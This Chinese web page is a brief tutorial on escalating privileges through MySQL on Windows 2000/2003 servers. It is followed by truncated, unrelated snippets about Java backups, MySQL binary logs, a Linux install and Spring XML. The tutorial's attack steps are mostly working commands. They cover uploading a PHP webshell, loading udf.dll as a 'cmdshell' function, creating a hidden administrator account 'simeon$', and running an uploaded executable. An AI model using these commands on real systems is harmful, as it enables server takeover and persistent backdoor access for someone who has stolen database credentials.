Mysql提权
(1)获取Mysql数据库的root用户密码和数据库用户名
(2)上传提权php木马,通过连接3389可以知道服务器是2003系统
(3)udf.dll对应操作系统
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
(4)设置相应的路径后直接导出。
(5)执行以下命令
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user simeon$ 123456 /add');
select cmdshell('net localgroup administrators simeon$ /add');
select cmdshell('c:\simeon.exe'); 运行simeon.exe
drop function cmdshell; 删除函数
select cmdshell('netstat -an'); 这是查看端口查开放情况
相关文档:
mysql数据库本身有数据备份和批量数据插入的命令,java代码可执行这些命令。
安装mysql后,需要设置环境变量:我的电脑右击--属性--高级--环境变量,增加MYSQL_HOME=“mysql安装路径”,然后path=%MYSQL_HOME%\bin
代码如下:
import java.io.BufferedReader;
import java.io.FileInputStream;
import java. ......
MySQL的二进制日志可以说或是MySQL最重要的日志了,它记录了所有的DDL和DML(除了数据查询语句)语句,以事件形式记录,还包含语句所执行的消耗的时间,MySQL的二进制日志是失误安全型的.
在5.1的版本你二进制日志还替代了原本的更新日志.一般来说开启二进制日志大概会有1%的性能损耗(参见MySQL官方中文手册5.1.24版).二进制有两 ......
linux安装mysql.txt
2009-03-22 10:45
一、引言
想使用Linux已经很长时间了,由于没有硬性任务一直也没有系统学习,近日由于工作需要必须使用Linux下的MySQL。本以为有Windows下使用SQL Server的经验,觉得在Linux下安装MySql应该是易如反掌的事,可在真正安装和使用MySQL时走了很多弯路,遇见很多问题,毕竟Linux ......
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:jee="http://www.springframework.org/schema/jee"
&nbs ......
